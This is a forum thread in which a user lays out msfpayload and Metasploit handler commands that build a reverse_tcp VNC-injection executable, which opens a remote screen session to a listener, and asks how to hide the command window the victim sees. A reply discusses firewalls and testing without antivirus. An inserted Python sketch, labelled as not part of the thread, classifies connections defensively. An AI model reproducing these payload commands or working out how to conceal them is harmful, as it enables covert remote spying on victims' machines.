Good evening, guys
First I want to say many thanks for the genius support in this forum.
Friendly and professional answers aren't common.
Lately I played around a little bit with the combination of msfpayload and the vncinject payload.
My environment:
PC1: 192.168.0.2 ( XP or vista ) ( victim )
PC2: 192.168.0.3 ( Backtrack.... sure )
I create an exe file with ./msfpayload /windows/vncinject/reverse_tcp LHOST=192.168.0.3 LPORT=5500 R | -c 2 -t exe -o test.exe
On Backtrack I start the handler:
> use exploits/multi/handler
> set Payload /windows/vncinject/reverse_tcp
> set LHOST 192.168.0.3
> set LPORT 5500
> exploit
When the victim starts the exe, the vncdll is injected and on Backtrack I get my window to watch.
But now this bad blue cmdshell comes up at the victim...
Are there any possibilities to avoid this or catch the process and hide it?
Is there any other payload option I have to use to avoid this?
Another question is whether it is possible not to use the Metasploit handler in Backtrack to listen for the connection, but the RealVNC viewer or the UltraVNC viewer in listen mode?
Big thanks to all who have an idea.
Greetz
Cyclone
We now have like 20 threads going on meterpreter.....
Hi Purehate
I've written this post, but I can't find an answer to the questions, for example whether it is possible to use UltraVNC in listen mode. I've tried to do this, but when the payload tries to connect to UltraVNC (listen) nothing happens; instead the listener hangs. With the RealVNC listener simply nothing happens.
Perhaps I use the wrong payload parameters...
I will try to use the search function one more time, but the threads I've read don't deal with this problem.
Greetz
Cyclone
Make sure you understand how firewalls work/function with bind_tcp and reverse_tcp. (keyword: dmz)
Now, good advice after reading is to check it locally and then make sure it works.
Don't install any anti-virus or firewall on your local machine. Just try it without and
check how it works. It's really not that hard once you get to learn about it.
There's plenty of Metasploit and Meterpreter documentation and docs on the internet, trust me
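An added example, not part of any post in this thread: a defender-side sketch of the bind_tcp versus reverse_tcp firewall point made in the reply above, classifying constructed connection records by direction and flagging workstation-initiated sessions such as the one to port 5500 described in the first post. The record format, the monitored-host set and the allowed egress ports are assumptions.

```python
import ipaddress

# Assumptions for this example (not from the thread): which hosts are
# monitored workstations and which egress ports they normally need.
WORKSTATIONS = {ipaddress.ip_address("192.168.0.2")}
ALLOWED_EGRESS_PORTS = {53, 80, 443}

# Constructed sample records in the form "src_ip:src_port -> dst_ip:dst_port".
SAMPLE = [
    "192.168.0.2:49152 -> 192.168.0.3:5500",   # workstation dials out (reverse style)
    "192.168.0.3:40112 -> 192.168.0.2:5900",   # peer dials in (bind style)
    "192.168.0.2:49153 -> 198.51.100.7:443",   # ordinary web egress
    "203.0.113.9:51000 -> 192.168.0.2:5900",   # external host dials in
]

def parse(line):
    """Split 'ip:port -> ip:port' into (src_ip, src_port, dst_ip, dst_port)."""
    src, dst = (side.strip() for side in line.split("->"))
    s_ip, s_port = src.rsplit(":", 1)
    d_ip, d_port = dst.rsplit(":", 1)
    return (ipaddress.ip_address(s_ip), int(s_port),
            ipaddress.ip_address(d_ip), int(d_port))

def classify(line):
    """Return (direction, finding) as seen from the monitored workstations."""
    s_ip, _, d_ip, d_port = parse(line)
    if s_ip in WORKSTATIONS:
        # Host-initiated traffic passes an inbound-deny firewall, so only
        # egress filtering or monitoring sees reverse-style sessions.
        if d_port in ALLOWED_EGRESS_PORTS:
            return "outbound", None
        return "outbound", f"workstation-initiated session to unusual port {d_port}"
    if d_ip in WORKSTATIONS:
        # Bind-style sessions need an open inbound port on the workstation.
        return "inbound", f"unsolicited connection to workstation port {d_port}"
    return "other", None

def findings(lines):
    """Collect (direction, record, finding) for every flagged record."""
    flagged = []
    for line in lines:
        direction, finding = classify(line)
        if finding:
            flagged.append((direction, line, finding))
    return flagged

if __name__ == "__main__":
    for direction, line, finding in findings(SAMPLE):
        print(f"[{direction}] {line}: {finding}")
```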
What is a "bad blue cmdshell..."?